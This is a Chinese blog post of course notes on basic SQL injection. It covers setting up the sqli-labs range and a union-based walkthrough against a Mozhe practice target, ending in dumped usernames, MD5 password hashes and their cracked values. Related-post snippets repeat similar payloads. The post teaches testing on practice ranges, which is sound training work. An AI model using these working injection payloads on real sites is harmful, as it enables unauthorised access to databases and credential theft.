2020小迪培训(第12天 WEB 漏洞--SQL 注入之简要SQL注入)

最新推荐文章于 2022-01-04 21:27:13 发布
最新推荐文章于 2022-01-04 21:27:13 发布
阅读量706 收藏 5
点赞数 3
分类专栏: 2020小迪培训 文章标签: 数据库 python mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45889197/article/details/119489796
版权

WEB 漏洞-SQL 注入之简要SQL注入

​ 在本系列课程学习中,SQL 注入漏洞将是重点部分,其中 SQL 注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关 SQL 注入的核心。同样此类漏洞是WEB 安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。(右边是重点

image-20210803155054964

SQL注入安全测试中危害

  • 危害数据库里的数据
  • 直接危害到网站的权限(需要满足条件)

SQL注入产生原理详细分析

  • 原理:通过参数传递将恶意SQL语句传到SQL语句,实现自定义的攻击方式
  • 产生的条件:变量可控、能带入数据库查询、变量未存在过滤和过滤不严谨
  • 小知识点
1   www.xiaodi8.com/index.php?id=8
2   www.xiaodi8.com/?id=10
3   www.xiaodi8.com/?id=10&x=1
4   www.xiaodi8.com/index.php

以上可能存在注入的编号选项
1 2 3 4都有可能存在 
2 相当于1,只是将index.php被省略了
3 就多加了一个参数
4 有post注入

参数x有注入,以下那个注入测试是正确的?

A www.xiaodi8.com/news.php?y=1 and 1=1&x=2
B www.xiaodi8.com/news.php?y=1&x=2 and 1=1
C www.xiaodi8.com/news.php?y=1 and 1=1 &x=2 and 1=1
D www.xiaodi8.com/news.php?xx=1 and 1=1 &xxx=2 and 1=1

正确答案是 BC
A 错误的原因是注入点是x,却把注入的代码写在了y的后面
D 错误的原因是注入点是x,却没有出现x这个变量

!注意:我们在进行SQL注入的过程中应该明确注入点是哪个变量,在其后面加上我们需要注入的SQL语句,在使用工具的时候可能会默认在后面加上注入的SQL语句,这时候我们应该进行修改,使得能够成功在注入点后面加上代码,从而使注入能够成功。

搭建一个SQL注入学习靶场环境

  • 在这里,我们安装sqlilabs这个靶场(链接:https://github.com/Audi-1/sqli-labs)

  • 安装说明:

    1. 解压apache文件夹内的内容,例如/var/www
    2. 这将在其下创建一个文件夹sqlilabs,将下载的源码放在里面
    3. 打开 sql-labs 文件夹内 sql-connections 文件夹下的文件“db-creds.inc”。
    4. 更新您的 MYSQL 数据库用户名和密码。
    5. 从浏览器访问 sql-labs 文件夹以加载 index.html(http://127.0.0.1/sqlilabs/index.html)
    6. 单击链接 setup/resetDB 以创建数据库、创建表和填充数据。
    7. 准备使用的实验室,点击课程编号打开课程页面。
    8. 享受实验室

学习一个数据库mysql简单注入

MYSQL数据库
数据库A = 网站A = 数据库用户A
表名
列名
数据

数据库B=网站B=数据库用户B

数据库C=网站C=数据库用户C

如何判断注入点?

  • 老办法:
    and 1=1 页面正常
    and 1=2 页面错误
    可能存在注入点

  • 案例:
    SELECT * FROM users WHERE id=1 and 1=1 LIMIT 0,1 正常

    SELECT * FROM users WHERE id=1 and 1=2 LIMIT 0,1 错误

  • 依据前提:

    逻辑运算符
    或 且 非
    or and xor

    真 且 真 = 真
    真 且 假 = 假
    真 或 假 = 真

  • 依据:

    SELECT * FROM users WHERE id=1 真
    1=1 真
    1=2 假

    真且真=真 SELECT * FROM users WHERE id=1 and 1=1 LIMIT 0,1 正常
    真且假=假 SELECT * FROM users WHERE id=1 and 1=2 LIMIT 0,1 错误

  • 能不能用or判断?

    SELECT * FROM users WHERE id=1 or 1=1 LIMIT 0,1 正常
    SELECT * FROM users WHERE id=1 or 1=2 LIMIT 0,1 正常

    不能!

  • 原因是什么?
    前面的语句为真的时候,不能判断第两个语句为真还是假

要选用最舒服的方法测试是否存在注入点

SELECT * FROM users WHERE id=1dadad(随便输入) LIMIT 0,1
在可能存在注入的变量后随便输入值后,存在三种情况:

  • 对网页有影响,说明带入数据库进行查询有注入点
  • 对网页没有影响,说明没有带入数据库查询,说明对应的参数没有漏洞
  • 网站出现404错误/自动跳转到其他页面,这个时候说明网站对输入的东西有检测,出现这种情况,基本不存在SQL注入漏洞

请添加图片描述

必要知识点(SQL注入)

1.在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。
2.数据库中符号"."代表下一级,如xiaodi.user表示xiaodi数据库下的user表名。

information_schema.tables:记录所有表名信息的表
information_schema.columns:记录所有列名信息的表
table_name:表名
column_name:列名
table_schema:数据库名

sql语句中union注入的流程(使用墨者里面的靶场)

image-20210807164311138

image-20210807164412862

  • 判断注入

    • 在使用上面最舒服的方式进行判断,可以看出id为注入点

    image-20210807164147607

    image-20210807164226087

  • 猜解列名数量(字段数)

    order by x(数字) 正常与错误的正常值

    正确的话网页正常显示,错误的话网页报错
    http://219.153.49.228:49521/new_list.php?id=1 order by 4
    测试后可以发现order by 4的时候网页正常,5后面的数字网页开始报错

    image-20210807164542591

    image-20210807164617359

  • 报错猜解准备

    http://219.153.49.228:49521/new_list.php?id=1 union select 1,2,3,4

    image-20210807164846004

    http://219.153.49.228:49521/new_list.php?id=-1 union select 1,2,3,4

    image-20210807164754309

  • 信息收集

    数据库版本:version() 5.7.22-0ubuntu0.16.04.1
    数据库名字:database() mozhe_Discuz_StormGroup
    数据库用户:user() root@localhost
    操作系统:@@version_compile_os Linux

    http://219.153.49.228:49521/new_list.php?id=-1 union select 1,version(),database(),4

    image-20210807165058315

    http://219.153.49.228:49521/new_list.php?id=-1%20union%20select%201,user(),@@version_compile_os,4

    image-20210807165200395

  • 查询指定数据库名

    mozhe_Discuz_StormGroup下的表名信息:
    http://219.153.49.228:49521/new_list.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’

    image-20210807165428573

  • 查询所有表名

    http://219.153.49.228:49521/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’

    image-20210807165632729

  • 查询指定表名的全部列名

    StormGroup_member下的列名信息

    http://219.153.49.228:43230/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=‘StormGroup_member’

    image-20210807165958533

  • 查询指定数据
    http://219.153.49.228:49521/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member

    image-20210807170114283

  • 猜解多个数据(通过limit x,1 变动猜解)

    http://219.153.49.228:49521/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member limit 0,1

    image-20210807170114283

    356f589a7df439f6f744ff19bb8092c0 MD5 解密 dsan13

    http://219.153.49.228:49521/new_list.php?id=-1%20union%20select%201,name,password,4%20from%20StormGroup_member%20limit%201,1

    image-20210807170822932

    31cc73aa7893cef0045188565f38b1123 MD5解密240206

  • 这里第一个账号密码被禁用,我们可以通过limit的方式查看其他密码 / 在账号相同的情况下,我们也可以用group_concat函数查看全部的密码,最后通过得到的账号密码就可以得到key

案例演示

  • 简易代码分析 SQL 注入原理

  • Sqlilabs 注入靶场搭建简要使用

  • 墨者靶机真实 MYSQL 注入演示

涉及资源

https://github.com/Audi-1/sqli-labs

https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe

最后感谢小迪师傅的视频!!

笔记来源视频:点击这里

是阿明呐
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
B站小迪安全笔记第4-WEB源码拓展
m0_61530426的博客
07-11 705
小迪安全笔记
小迪安全学习笔记】WEB漏洞-SQL注入简要SQL注入
Akrios的博客
05-24 1010
在本系列课程学习中,SQL注入漏洞是将是重点部分,其中SQL注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关SQL注入的核心。同样此类漏洞WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。 SQL注入安全测试中危害 分为两类:危害数据库里的数据、直接危害到网站的权限(需要满足条件) SQL注入产生原理详细分析 见案例 SQL语句在定义的时候没有变量,就不能进行SQL注入 可控变量,带入数据库查询,变量为存在过滤或过滤不严谨 可能存在注入
小迪渗透&CTF夺旗&SRC挖掘(拾叁)
weixin_41665162的博客
09-04 1580
文章目录83. Python考点SSTI&反序列化&字符串(83-85)演示案例:涉及资源84. PHP弱类型&异或取反&序列化&RCEPHP常考点弱类型绕过对比总结涉及资源 83. Python考点SSTI&反序列化&字符串(83-85) 演示案例: CTF夺旗-Python-支付逻辑&JWT&反序列化 CTF夺旗-Python-Flask&jinja2&SSTI模版注入 CTF夺旗-Python-格式化字符串漏洞
小迪安全04
weixin_45382875的博客
06-24 327
基础入门-WEB源码拓展 小迪安全04 2021/6/24 前言:   Web源码在安全测试中是非常重要的信息来源,可以用来代码审计漏洞也可以用来做信息突破口,其中Web源码有很多技术需要简明分析。 比如:获取某ASP源码后可以采用默认数据库下载为突破,获取某其他脚本源码漏洞可以进行代码审计挖掘或分析其业务逻辑等,总之源码的获取将为后期的安全测试提供了更多的思路。 知识点: 关于Web源码目录结构 关于Web源码脚本类型 关于WEB源码应用分类 关于Web源码其他说明 关于Web源码目录结构 数据库
sql注入靶场1-65
weixin_44664530的博客
03-26 585
第一关: 单引号闭合: order by 判断字段数,显示位2.3: 输出数据库版本?id=-1' union select 1,2,version() --+ 输出数据库名称:?id=-1' union select 1,2,database() --+查看所有表名:?id=-1' union select 1,2,group_concat(table_name) from informatio...
第14WEB漏洞-SQL注入之类型及提交注入1
08-03
#简要明确参数类型数字,字符,搜索,JSON 等#简要明确请求方法GET,POST,COOKIE,REQUEST,HTTP 头等其中 SQL 语句干扰符号:',
第16WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
Access 偏移注入:解决列名获取不到的情况查看登陆框源代码的表单值或观察 URL 特征等也可以针对表或列获取不到的情况select 查询数据在网站应用中进行
第18WEB漏洞-SQL注入之堆叠及WAF绕过注入1
08-03
1、逻辑问题 2、性能问题 3、白名单
第17WEB漏洞-SQL注入之二次,加解密,DNS等注入1
08-03
WEB 漏洞-二次,加解密,DNS 等注入#加解密,二次,DNSlog 注入注入原理,演示案例,实际应用(中转注入)DNSlog:解决了盲注不能回显数据,效率低
cracer安全学院内部练习靶场
04-13
这是最新大佬分享出来的靶机下载地址,是最新的cracer大佬的靶机地址,解压密码在压缩包内打开即可看到解压密码。希望大家能够希望
本地搭建简单SQL注入环境
热门推荐
endeav_or的博客
08-10 1万+
首先本地要有一个wamp server,因为SQL注入涉及到与数据库交互,所以先从搭建测试数据库开始。       打开mysql console,输入root账户密码登陆。创建一个数据库,并命名为fake,命令如下:create database fake;      因为我之前已经建立好了,这里直接配置fake数据库的用户权限,配置为leon用户访问,且leon用户的密码为leon,命令如下:
小迪教程第七——提交方式注入
仲夏
10-17 941
1.GET<?php //get方式传递 $id=$_GET['id']; echo $id;?>2.POST<?php //post方式传递 $id=$_POST['id']; echo $id;?>3.COOKIE<?php //cookie方式传递 $id=$_COOKIE['id']; echo $id;?>4、cookie和session认识Cookie:可以接受数据,验证用户的凭据,存储
小迪教程第八——参数类型注入
仲夏
10-17 288
1、数字型数字不需要注意符号,直接注入即可$sql1="select * from user where id=$int";//定义数字注入sql语句2、字符型sql语句中组合时,字符需要符号扩起$sql2="select * from user where username='$str'";// 定义字符串注入sql语句注入过程: 3、搜索型$sql3="select * from user w
pikachu靶场SQL注入
0nc3的博客
08-09 1万+
0x00 前言 手工注入忘的差不多了。。。还是需要多多练习 以下关卡都是稍微测以下存不存在sql注入,查下数据库名啥的 没有将所有字段都爆出来。 冲鸭~ 0x01 数字型注入(post) 因为是数字型,直接在后面加上真命题,不需要加单引号测试 0x02 字符型注入(get) 加单引号报错,说明存在sql注入 再加上真命题查询到all 0x03 搜索型注入 加单引号,sql语句报错 Paylo...
小迪教程第六——php+mysql注入权限入侵下部分+疑难杂症
仲夏
10-16 769
1、php+mysql注入主要内容1)爆后台帐号密码(当前数据库) 2)文件读取和导出 3)爆其他数据库下的数据2、爆其他数据库下的数据Mysql 数据库A == A网站 表名 列名 数据 数据库B == B网站 数据库C == C网站数据库A对应的网站A注入点,我们尝试通过网站A的注入点获取数据库BC…数据Mysql跨库注入 1.获取mysql
2020小迪培训(第14 WEB 漏洞-类型及提交注入
是阿明呐的博客
08-11 735
WEB 漏洞-类型及提交注入 前言 ​ 在真实 SQL 注入安全测试中,我们一定要先明确提交数据及提交方法后再进行注入,其中提交数据类型和提交方法可以通过抓包分析获取, 后续安全测试中我们也必须满足同等的操作才能进行注入简要明确参数类型 数字、字符、搜索、JSON (在实际操作中,我们需要用工具/人工进行多次尝试) 数字:前面教程所演示的SQL注入参数类型都是数字型的,我们在注入的时候不需要进行符号闭合的操作 字符:带有单引号,我们不能再采取数字型的注入方式,不然咱们进行测试的语句也被带进语
小迪安全web安全|渗透测试|网络安全 | 学习笔记-终
youngerll的博客
01-04 5071
小迪安全web安全|渗透测试|网络安全 | 学习笔记-终
WEB漏洞-SQL注入简要SQL注入
硫酸超的博客
07-27 446
@[TOC]WEB漏洞-SQL注入简要SQL注入 前言 在本系列课程学习中,SQL注入漏洞是将是重点部分,其中SQL注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关SQL注入的核心。同样此类漏洞WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。 SQL注入安全测试中危害 分为两类:危害数据库里的数据、直接危害到网站的权限(需要满足条件) SQL注入产生原理详细分析 见案例 SQL语句在定义的时候没有变量,就不能进行SQL注入 可控变量,带
SQL注入漏洞-手工注入
最新发布
05-21
对于SQL注入漏洞的手工注入,建议使用一些工具来进行测试,如SQLMap、Havij等。这些工具可以通过一些特定的语句来测试目标网站是否存在SQL注入漏洞,并且可以自动化执行攻击,并且提供详细的攻击日志,方便测试人员进行漏洞的修复和弥补。但是需要注意的是,在使用这些工具进行测试时,一定要严格遵守相关法律法规,不得滥用,以免造成不必要的损失和困扰。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值